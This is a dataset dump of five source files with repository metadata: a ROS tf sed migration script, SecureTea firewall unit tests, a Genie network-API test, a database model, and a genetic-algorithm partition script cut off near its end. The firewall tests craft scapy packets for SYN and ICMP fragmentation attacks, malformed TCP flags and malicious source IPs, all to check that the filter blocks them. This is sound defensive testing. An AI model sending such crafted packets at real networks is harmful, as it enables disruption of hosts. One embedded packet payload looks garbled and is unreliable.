hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acf68d8dedc11023abb43254cda52836adc997ea | 3,294 | py | Python | src/workspace/src/tf/scripts/bullet_migration_sed.py | glabmoris/Poseidon | 801dad37ab49adc1a31ccfc1e551c02676ad77c0 | [
"MIT"
] | 7 | 2022-02-17T23:29:45.000Z | 2022-03-12T09:23:54.000Z | src/geometry/tf/scripts/bullet_migration_sed.py | Serru/MultiCobot-UR10-Gripper | e22a80c9b90f29ca7115c96740a3bdbcc6430d7a | [
"CC-BY-4.0"
] | 38 | 2021-09-07T16:39:14.000Z | 2022-03-15T13:41:07.000Z | src/geometry/tf/scripts/bullet_migration_sed.py | Serru/MultiCobot-UR10-Gripper | e22a80c9b90f29ca7115c96740a3bdbcc6430d7a | [
"CC-BY-4.0"
] | 9 | 2021-04-01T15:34:43.000Z | 2021-11-09T19:07:08.000Z | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Run this script to update bullet datatypes from tf in Electric to
# Fuerte/Unstable or newer
# by default this assumes your files are not using the tf namespace.
# If they are change the line below with the for loop to use the
# namespaced_rules
from __future__ import print_function
import subprocess
cmd = "find . -type f ! -name '*.svn-base' -a ! -name '*.hg' -a ! -name '*.git' -a \( -name '*.c*' -o -name '*.h*' \) -exec sed -i '%(rule)s' {} \;"
rules = ['s|LinearMath/bt|tf/LinearMath/|g', # include path
's/btTransform\.h/Transform\.h/g', # include files
's/btMatrix3x3\.h/Matrix3x3\.h/g',
's/btScalar\.h/Scalar\.h/g',
's/btQuaternion\.h/Quaternion\.h/g',
's/btQuadWord\.h/QuadWord\.h/g',
's/btMinMax\.h/MinMax\.h/g',
's/btVector3\.h/Vector3\.h/g',
's/btScalar/tfScalar/g',
]
unnamespaced_rules = [
's/btTransform/tf::Transform/g',
's/btQuaternion/tf::Quaternion/g',
's/btVector3/tf::Vector3/g',
's/btMatrix3x3/tf::Matrix3x3/g',
's/btQuadWord/tf::QuadWord/g',
]
namespaced_rules = [
's/btTransform/Transform/g',
's/btQuaternion/Quaternion/g',
's/btVector3/Vector3/g',
's/btMatrix3x3/Matrix3x3/g',
's/btQuadWord/QuadWord/g',
#'s/btScalar/Scalar/g',
]
for rule in rules + unnamespaced_rules: #change me if using files with namespace tf set
full_cmd = cmd%locals()
print("Running {}".format(full_cmd))
ret_code = subprocess.call(full_cmd, shell=True)
if ret_code == 0:
print("success")
else:
print("failure")
| 36.197802 | 148 | 0.683667 |
acf68d9b56489e35c2d861e2a649a3c58850746b | 11,958 | py | Python | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 257 | 2018-03-28T12:43:20.000Z | 2022-03-29T07:07:23.000Z | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 155 | 2018-03-31T14:57:46.000Z | 2022-03-17T18:12:41.000Z | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 132 | 2018-03-27T06:25:20.000Z | 2022-03-28T11:32:45.000Z | # -*- coding: utf-8 -*-
import unittest
from securetea.lib.firewall.packet_filter import PacketFilter
import scapy.all as scapy
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestPacket_Filter(unittest.TestCase):
    """Test class for PacketFilter module.

    Each test pokes PacketFilter's private rule attributes (a rule list such
    as ``_IP_INBOUND`` and its matching ``_action_*`` flag) directly, then
    checks the integer verdict (0 or 1) the rule method returns for a fixed
    captured packet built in setUp.
    """
    def setUp(self):
        """
        Set-up PacketFilter object.
        """
        # Raw bytes of a captured IPv4/TCP packet, re-parsed below with
        # scapy.IP().  NOTE(review): the wrapped lines of this literal begin
        # with bare "x.." text (no backslash), so those fragments parse as
        # literal ASCII characters rather than byte escapes -- this looks
        # like formatting damage; verify against the original capture.
        payload = b"""E\x00\x004Q\xc8@\x00@\x06Z\x87\xc0\xa8\x89\x7fh\
x82\xdb\xca\x94\xc0\x01\xbb=L\xd3\x97\x14\t\xc9q\
x80\x10\x00\xf5\xe7B\x00\x00\x01\x01\x08\n\xeb7\xc9\
xa6bjc\xed"""
        self.pf1 = PacketFilter(test=True)
        self.scapy_pkt = scapy.IP(payload)
    def test_inbound_IPRule(self):
        """
        Test inbound_IPRule.
        """
        # Empty rule list: the verdict depends only on the action flag.
        self.pf1._action_inbound_IPRule = 0
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_inbound_IPRule = 1
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        # Rule list with an IP that does not flip the verdict.
        self.pf1._IP_INBOUND = ['104.32.32.32']
        self.pf1._action_inbound_IPRule = 1
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._IP_INBOUND = ['104.32.32.32']
        self.pf1._action_inbound_IPRule = 0
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        # Rule list with an IP that matches the packet: verdicts invert.
        self.pf1._IP_INBOUND = ['192.168.137.127']
        self.pf1._action_inbound_IPRule = 0
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._IP_INBOUND = ['192.168.137.127']
        self.pf1._action_inbound_IPRule = 1
        result = self.pf1.inbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_outbound_IPRule(self):
        """
        Test outbound IPRule.
        """
        # Same scenario matrix as test_inbound_IPRule, but note the
        # matching/non-matching IPs are swapped (outbound checks the other
        # packet address).
        self.pf1._action_outbound_IPRule = 0
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_outbound_IPRule = 1
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._IP_OUTBOUND = ['192.168.137.127']
        self.pf1._action_outbound_IPRule = 1
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._IP_OUTBOUND = ['192.168.137.127']
        self.pf1._action_outbound_IPRule = 0
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._IP_OUTBOUND = ['104.32.32.32']
        self.pf1._action_outbound_IPRule = 0
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._IP_OUTBOUND = ['104.32.32.32']
        self.pf1._action_outbound_IPRule = 1
        result = self.pf1.outbound_IPRule(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_protocolRule(self):
        """
        Test protocolRule.
        """
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_protocolRule = 1
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        # '6' is the packet's protocol (TCP); note the attribute name typo
        # (_PROTCOLS) matches the implementation.
        self.pf1._PROTCOLS = ['6']
        self.pf1._action_protocolRule = 1
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_protocolRule = 0
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        # '1' (ICMP) does not match the TCP packet.
        self.pf1._PROTCOLS = ['1']
        self.pf1._action_protocolRule = 1
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._PROTCOLS = ['1']
        self.pf1._action_protocolRule = 0
        result = self.pf1.protocolRule(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_DNSRule(self):
        """
        Test DNSRule.
        """
        # No DNS layer in the packet: rule passes it through.
        result = self.pf1.DNSRule(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_source_portRule(self):
        """
        Test source_portRule.
        """
        result = self.pf1.source_portRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_source_portRule = 1
        result = self.pf1.source_portRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._SPORTS = ['8224']
        result = self.pf1.source_portRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_source_portRule = 0
        result = self.pf1.source_portRule(self.scapy_pkt)
        self.assertEqual(result, 0)
    def test_dest_portRule(self):
        """
        Test dest_portRule.
        """
        result = self.pf1.dest_portRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_dest_portRule = 1
        result = self.pf1.dest_portRule(self.scapy_pkt)
        self.assertEqual(result, 0)
        self.pf1._DPORTS = ['8224']
        result = self.pf1.dest_portRule(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_dest_portRule = 0
        result = self.pf1.dest_portRule(self.scapy_pkt)
        self.assertEqual(result, 0)
    def test_HTTPRequest(self):
        """
        Test HTTPRequest.
        """
        # No HTTP layer in the packet: rule passes it through.
        result = self.pf1.HTTPRequest(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_HTTPResponse(self):
        """
        Test HTTPResponse.
        """
        # No HTTP layer in the packet: rule passes it through.
        result = self.pf1.HTTPResponse(self.scapy_pkt)
        self.assertEqual(result, 1)
    def test_scanLoad(self):
        """
        Test scanLoad.
        """
        result = self.pf1.scanLoad(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_scanLoad = 1
        result = self.pf1.scanLoad(self.scapy_pkt)
        self.assertEqual(result, 0)
        # A configured extension that does not appear in the payload does
        # not change the verdict.
        self.pf1._action_scanLoad = 0
        self.pf1._EXTENSIONS = [".exe"]
        result = self.pf1.scanLoad(self.scapy_pkt)
        self.assertEqual(result, 1)
        self.pf1._action_scanLoad = 1
        result = self.pf1.scanLoad(self.scapy_pkt)
        self.assertEqual(result, 0)
    def test_check_first_fragment(self):
        """
        Test check_first_fragment.
        """
        # First fragment (frag=0, MF set) with a small total length is
        # blocked; a sufficiently long first fragment passes.
        pkt = scapy.IP(flags="MF",
                       frag=0,
                       len=100)
        result = self.pf1.check_first_fragment(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(flags="MF",
                       frag=0,
                       len=160)
        result = self.pf1.check_first_fragment(pkt)
        self.assertEqual(result, 1)
    def test_check_ip_version(self):
        """
        Test check_ip_version.
        """
        # Only IP versions 4 and 6 are accepted.
        pkt = scapy.IP(version=8)
        result = self.pf1.check_ip_version(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(version=4)
        result = self.pf1.check_ip_version(pkt)
        self.assertEqual(result, 1)
        pkt = scapy.IP(version=6)
        result = self.pf1.check_ip_version(pkt)
        self.assertEqual(result, 1)
    def test_check_ip_fragment_boundary(self):
        """
        Test check_ip_fragment_boundary.
        """
        # A fragment whose offset plus length would overflow the datagram
        # boundary is blocked.
        pkt = scapy.IP(len=60000, frag=7000)
        result = self.pf1.check_ip_fragment_boundary(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(len=60000, frag=1000)
        result = self.pf1.check_ip_fragment_boundary(pkt)
        self.assertEqual(result, 1)
    def test_check_ip_fragment_offset(self):
        """
        Test check_ip_fragment_offset.
        """
        # Offsets in a suspicious low (but non-zero) range are blocked.
        pkt = scapy.IP(frag=50)
        result = self.pf1.check_ip_fragment_offset(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(frag=70)
        result = self.pf1.check_ip_fragment_offset(pkt)
        self.assertEqual(result, 1)
        pkt = scapy.IP(frag=0)
        result = self.pf1.check_ip_fragment_offset(pkt)
        self.assertEqual(result, 1)
    def test_check_invalid_ip(self):
        """
        Test check_invalid_ip.
        """
        # A syntactically valid source address passes.
        pkt = scapy.IP(src="1.1.1.1")
        result = self.pf1.check_invalid_ip(pkt)
        self.assertEqual(result, 1)
    def test_check_ip_header_length(self):
        """
        Test check_ip_header_length.
        """
        # Total length below the minimum IP header size is blocked.
        pkt = scapy.IP(len=10)
        result = self.pf1.check_ip_header_length(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(len=30)
        result = self.pf1.check_ip_header_length(pkt)
        self.assertEqual(result, 1)
    def test_check_tcp_flag(self):
        """
        Test check_tcp_flag.
        """
        # A TCP segment with a null flag set is blocked.
        pkt = scapy.TCP(flags=None)
        result = self.pf1.check_tcp_flag(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.TCP(flags="S")
        result = self.pf1.check_tcp_flag(pkt)
        self.assertEqual(result, 1)
    def test_check_network_congestion(self):
        """
        Test check_network_congestion.
        """
        # ECE+CWR (congestion) flags are blocked; plain SYN passes.
        pkt = scapy.TCP(flags="EC")
        result = self.pf1.check_network_congestion(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.TCP(flags="S")
        result = self.pf1.check_network_congestion(pkt)
        self.assertEqual(result, 1)
    def test_check_fin_ack(self):
        """
        Test check_fin_ack.
        """
        # FIN must be accompanied by ACK; a lone FIN is blocked.
        pkt = scapy.TCP(flags="FA")
        result = self.pf1.check_fin_ack(pkt)
        self.assertEqual(result, 1)
        pkt = scapy.TCP(flags="F")
        result = self.pf1.check_fin_ack(pkt)
        self.assertEqual(result, 0)
    def test_syn_fragmentation_attack(self):
        """
        Test syn_fragmentation_attack.
        """
        # A fragmented SYN (any fragment field combination) is blocked.
        pkt = scapy.IP(flags="MF",
                       frag=10) \
              / scapy.TCP(flags="S")
        result = self.pf1.syn_fragmentation_attack(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(flags="MF",
                       frag=0) \
              / scapy.TCP(flags="S")
        result = self.pf1.syn_fragmentation_attack(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(flags="MF",
                       frag=0) \
              / scapy.TCP(flags="F")
        result = self.pf1.syn_fragmentation_attack(pkt)
        self.assertEqual(result, 1)
    def test_check_large_icmp(self):
        """
        Test check_large_icmp.
        """
        # Oversized ICMP (proto=1) packets are blocked.
        pkt = scapy.IP(proto=1,
                       len=2048)
        result = self.pf1.check_large_icmp(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(proto=1,
                       len=512)
        result = self.pf1.check_large_icmp(pkt)
        self.assertEqual(result, 1)
    def test_icmp_fragmentation_attack(self):
        """
        Test icmp_fragmentation_attack.
        """
        # Fragmented ICMP is blocked; the same fragments with a non-ICMP
        # protocol pass.
        pkt = scapy.IP(proto=1,
                       flags="MF",
                       frag=20)
        result = self.pf1.icmp_fragmentation_attack(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(proto=1,
                       flags="MF",
                       frag=0)
        result = self.pf1.icmp_fragmentation_attack(pkt)
        self.assertEqual(result, 0)
        pkt = scapy.IP(proto=2,
                       flags="MF",
                       frag=20)
        result = self.pf1.icmp_fragmentation_attack(pkt)
        self.assertEqual(result, 1)
    @patch("securetea.lib.firewall.packet_filter.utils.open_file")
    def test_check_mal_ip(self, mck_open):
        """
        Test check_mal_ip.
        """
        # The malicious-IP list is read through utils.open_file, mocked here.
        mck_open.return_value = ["1.1.1.1"]
        # Case 1: When IP is in malicious IP list, block packet
        pkt = scapy.IP(src="1.1.1.1")
        result = self.pf1.check_mal_ip(pkt)
        self.assertEqual(result, 0)
        # Case 2: When IP is not in malicious IP list, allow packet
        pkt = scapy.IP(src="2.2.2.2")
        result = self.pf1.check_mal_ip(pkt)
        self.assertEqual(result, 1)
| 30.58312 | 74 | 0.590901 |
acf68dd7e5ca6fd5fc31306b0570ba40d29a8b4b | 27 | py | Python | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | null | null | null | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | 2 | 2019-12-14T02:52:32.000Z | 2021-02-18T23:04:44.000Z | VALIDATOR_KEY_DIR = "keys"
| 13.5 | 26 | 0.777778 |
acf68e261ddeeb5bc3801e4f6197ad973b1040c0 | 962 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | import unittest
from pyats.topology import loader
from genie.libs.sdk.apis.iosxe.vrf.configure import unconfigure_mdt_auto_discovery_mldp
class TestUnconfigureMdtAutoDiscoveryMldp(unittest.TestCase):
    """Unit test for the unconfigure_mdt_auto_discovery_mldp API, run against
    a mocked IOS-XE device that replays recorded CLI output."""
    @classmethod
    # NOTE(review): the conventional name for the first argument of a
    # classmethod is `cls`; `self` works here but is misleading.
    def setUpClass(self):
        # Inline pyATS testbed: a single cat9k device ('P1') whose connection
        # command launches a mock CLI backed by the mock_data directory.
        testbed = """
        devices:
            P1:
                connections:
                    defaults:
                        class: unicon.Unicon
                    a:
                        command: mock_device_cli --os iosxe --mock_data_dir mock_data --state connect
                        protocol: unknown
                os: iosxe
                platform: cat9k
                type: c9500
        """
        self.testbed = loader.load(testbed)
        self.device = self.testbed.devices['P1']
        self.device.connect()
    def test_unconfigure_mdt_auto_discovery_mldp(self):
        # The API is expected to complete without error and return None for
        # vrf3001 / ipv4 on the mocked device.
        result = unconfigure_mdt_auto_discovery_mldp(self.device, 'vrf3001', 'ipv4')
        expected_output = None
        self.assertEqual(result, expected_output)
| 31.032258 | 93 | 0.627859 |
acf68ef832f7e026cfd2a804b96c81f982f503b6 | 644 | py | Python | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 251 | 2015-11-09T15:43:25.000Z | 2021-12-17T08:38:23.000Z | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 2 | 2019-09-03T17:41:03.000Z | 2021-01-15T13:51:06.000Z | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 20 | 2016-01-25T06:38:33.000Z | 2022-03-18T13:56:40.000Z | __author__ = 'chenzhao'
from base import *
class CreditTransaction(db.Model, BasicModelMixin):
    """A single transfer of credits from a requester to a worker, linked to
    the campaign/hit/answer it rewards."""
    # Primary key.
    id = db.Column(db.Integer, primary_key=True)
    # Amount of credit transferred; required.
    credit = db.Column(db.Integer, nullable=False)
    # Loose references to the related records (plain integers, not FKs).
    campaign_id = db.Column(db.Integer)
    hit_id = db.Column(db.Integer)
    answer_id = db.Column(db.Integer)
    # The worker receiving the credit.
    worker_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    worker = db.relationship('User', foreign_keys=worker_id)
    # The requester paying the credit.
    requester_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    requester = db.relationship('User', foreign_keys=requester_id)
    # Creation timestamp (set at insert time).
    created_on = db.Column(db.DateTime, default=datetime.datetime.now)
| 32.2 | 70 | 0.720497 |
acf68f8c586dfd28cbe5ca53755f03d82e054282 | 6,815 | py | Python | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | import random
import numpy as np
import functools
import utils
K = 10 # number of piles/bins the objects are partitioned into
POP_SIZE = 500 # population size
MAX_GEN = 500 # maximum number of generations
CX_PROB = 0.8 # crossover probability
MUT_PROB = 0.2 # mutation probability
MUT_FLIP_PROB = 0.1 # per-gene probability of changing value during mutation
REPEATS = 1 # number of runs of algorithm (should be at least 10)
OUT_DIR = 'partition' # output directory for logs
EXP_ID = 'default' # the ID of this experiment (used to create log names)
# reads the input set of values of objects
def read_weights(filename):
    """Read the object weights from *filename*, one integer per line."""
    with open(filename) as infile:
        return [int(line) for line in infile]
# computes the bin weights
# - bins are the indices of bins into which the object belongs
def bin_weights(weights, bins, k=None):
    """Compute the total weight of each bin.

    Arguments:
        weights -- weight of each object
        bins    -- index of the bin each object belongs to
        k       -- number of bins; defaults to the module-level K so all
                   existing two-argument callers keep working (generalized
                   from the previously hard-coded global)
    Returns a list of length k with the summed weight per bin.
    """
    num_bins = K if k is None else k
    bw = [0] * num_bins
    for w, b in zip(weights, bins):
        bw[b] += w
    return bw
# the fitness function
def fitness(ind, weights):
    """Fitness of an individual: how evenly the bins are loaded.

    The objective is the spread (max bin weight - min bin weight, lower is
    better); the fitness is its inverse mapped to (0, 1].  max() and min()
    are computed once each (the original evaluated them twice).
    """
    bw = bin_weights(weights, ind)
    heaviest = max(bw)
    lightest = min(bw)
    spread = heaviest - lightest
    return utils.FitObjPair(fitness=1/(spread + 1),
                            objective=spread)
# creates the individual
def create_ind(ind_len):
    """Create a random individual: one bin index in [0, K) per object."""
    return [random.randrange(K) for _ in range(ind_len)]
# creates the population using the create individual function
def create_pop(pop_size, create_individual):
    """Build a population by calling *create_individual* pop_size times."""
    individuals = []
    for _ in range(pop_size):
        individuals.append(create_individual())
    return individuals
# the roulette wheel selection
def roulette_wheel_selection(pop, fits, k):
    """Select *k* individuals with replacement, weighted by fitness."""
    return random.choices(pop, weights=fits, k=k)
# implements the one-point crossover of two individuals
def one_pt_cross(p1, p2):
    """One-point crossover: swap the tails of two parents at a random cut."""
    cut = random.randrange(1, len(p1))
    first = p1[:cut] + p2[cut:]
    second = p2[:cut] + p1[cut:]
    return first, second
# implements the "bit-flip" mutation of one individual
def flip_mutate(p, prob, upper):
    """Independently replace each gene, with probability *prob*, by a random
    value drawn from [0, upper)."""
    mutated = []
    for gene in p:
        if random.random() < prob:
            mutated.append(random.randrange(0, upper))
        else:
            mutated.append(gene)
    return mutated
# applies a list of genetic operators (functions with 1 argument - population)
# to the population
def mate(pop, operators):
    """Pipe the population through every genetic operator in order."""
    return functools.reduce(lambda current, op: op(current), operators, pop)
# applies the cross function (implementing the crossover of two individuals)
# to the whole population (with probability cx_prob)
def crossover(pop, cross, cx_prob):
    """Pair consecutive individuals and recombine each pair with probability
    *cx_prob*; non-recombined pairs are copied unchanged."""
    offspring = []
    for first, second in zip(pop[::2], pop[1::2]):
        if random.random() < cx_prob:
            child_a, child_b = cross(first, second)
        else:
            child_a, child_b = first[:], second[:]
        offspring.extend((child_a, child_b))
    return offspring
# applies the mutate function (implementing the mutation of a single individual)
# to the whole population with probability mut_prob)
def mutation(pop, mutate, mut_prob):
    """Mutate each individual with probability *mut_prob*; the rest are
    shallow-copied unchanged."""
    result = []
    for ind in pop:
        if random.random() < mut_prob:
            result.append(mutate(ind))
        else:
            result.append(ind[:])
    return result
# implements the evolutionary algorithm
# arguments:
# pop_size - the initial population
# max_gen - maximum number of generation
# fitness - fitness function (takes individual as argument and returns
# FitObjPair)
# operators - list of genetic operators (functions with one arguments -
# population; returning a population)
# mate_sel - mating selection (funtion with three arguments - population,
# fitness values, number of individuals to select; returning the
# selected population)
# map_fn - function to use to map fitness evaluation over the whole
# population (default `map`)
# log - a utils.Log structure to log the evolution run
def evolutionary_algorithm(pop, max_gen, fitness, operators, mate_sel, *, map_fn=map, log=None):
    """Run a generational evolutionary algorithm and return the final
    population.

    Arguments:
        pop       -- the initial population
        max_gen   -- maximum number of generations
        fitness   -- function mapping an individual to a FitObjPair
        operators -- genetic operators (each maps population -> population)
        mate_sel  -- mating selection: (population, fitnesses, count) ->
                     selected parents
        map_fn    -- map-like function used to evaluate fitness over the
                     whole population (default `map`)
        log       -- optional utils.Log structure recording the run
    """
    evals = 0
    for _ in range(max_gen):
        fits_objs = list(map_fn(fitness, pop))
        evals += len(pop)
        if log:
            log.add_gen(fits_objs, evals)
        fits = [f.fitness for f in fits_objs]
        # Select as many parents as there are individuals.  Using len(pop)
        # rather than the module-level POP_SIZE makes the algorithm correct
        # for any population size the caller supplies (identical behavior
        # for the standard POP_SIZE-sized populations).
        mating_pool = mate_sel(pop, fits, len(pop))
        offspring = mate(mating_pool, operators)
        pop = offspring[:]
    return pop
if __name__ == '__main__':
    # read the weights from input
    weights = read_weights('inputs/partition-easy.txt')
    # use `functools.partial` to fix some arguments of the functions
    # and create functions with the required signatures
    cr_ind = functools.partial(create_ind, ind_len=len(weights))
    fit = functools.partial(fitness, weights=weights)
    xover = functools.partial(crossover, cross=one_pt_cross, cx_prob=CX_PROB)
    mut = functools.partial(mutation, mut_prob=MUT_PROB,
                            mutate=functools.partial(flip_mutate, prob=MUT_FLIP_PROB, upper=K))
    # we can use multiprocessing to evaluate fitness in parallel
    import multiprocessing
    pool = multiprocessing.Pool()
    import matplotlib.pyplot as plt
    # run the algorithm `REPEATS` times and remember the best solutions from
    # last generations
    best_inds = []
    for run in range(REPEATS):
        # initialize the log structure
        log = utils.Log(OUT_DIR, EXP_ID, run,
                        write_immediately=True, print_frequency=5)
        # create population
        pop = create_pop(POP_SIZE, cr_ind)
        # run evolution - notice we use the pool.map as the map_fn
        pop = evolutionary_algorithm(pop, MAX_GEN, fit, [xover, mut], roulette_wheel_selection, map_fn=pool.map, log=log)
        # remember the best individual from last generation, save it to file
        # (max compares the FitObjPair values returned by fit)
        bi = max(pop, key=fit)
        best_inds.append(bi)
        with open(f'{OUT_DIR}/{EXP_ID}_{run}.best', 'w') as f:
            for w, b in zip(weights, bi):
                f.write(f'{w} {b}\n')
        # if we used write_immediately = False, we would need to save the
        # files now
        # log.write_files()
    # print an overview of the best individuals from each run
    for i, bi in enumerate(best_inds):
        print(f'Run {i}: difference = {fit(bi).objective}, bin weights = {bin_weights(weights, bi)}')
    # write summary logs for the whole experiment
    utils.summarize_experiment(OUT_DIR, EXP_ID)
    # read the summary log and plot the experiment
    evals, lower, mean, upper = utils.get_plot_data(OUT_DIR, EXP_ID)
    plt.figure(figsize=(12, 8))
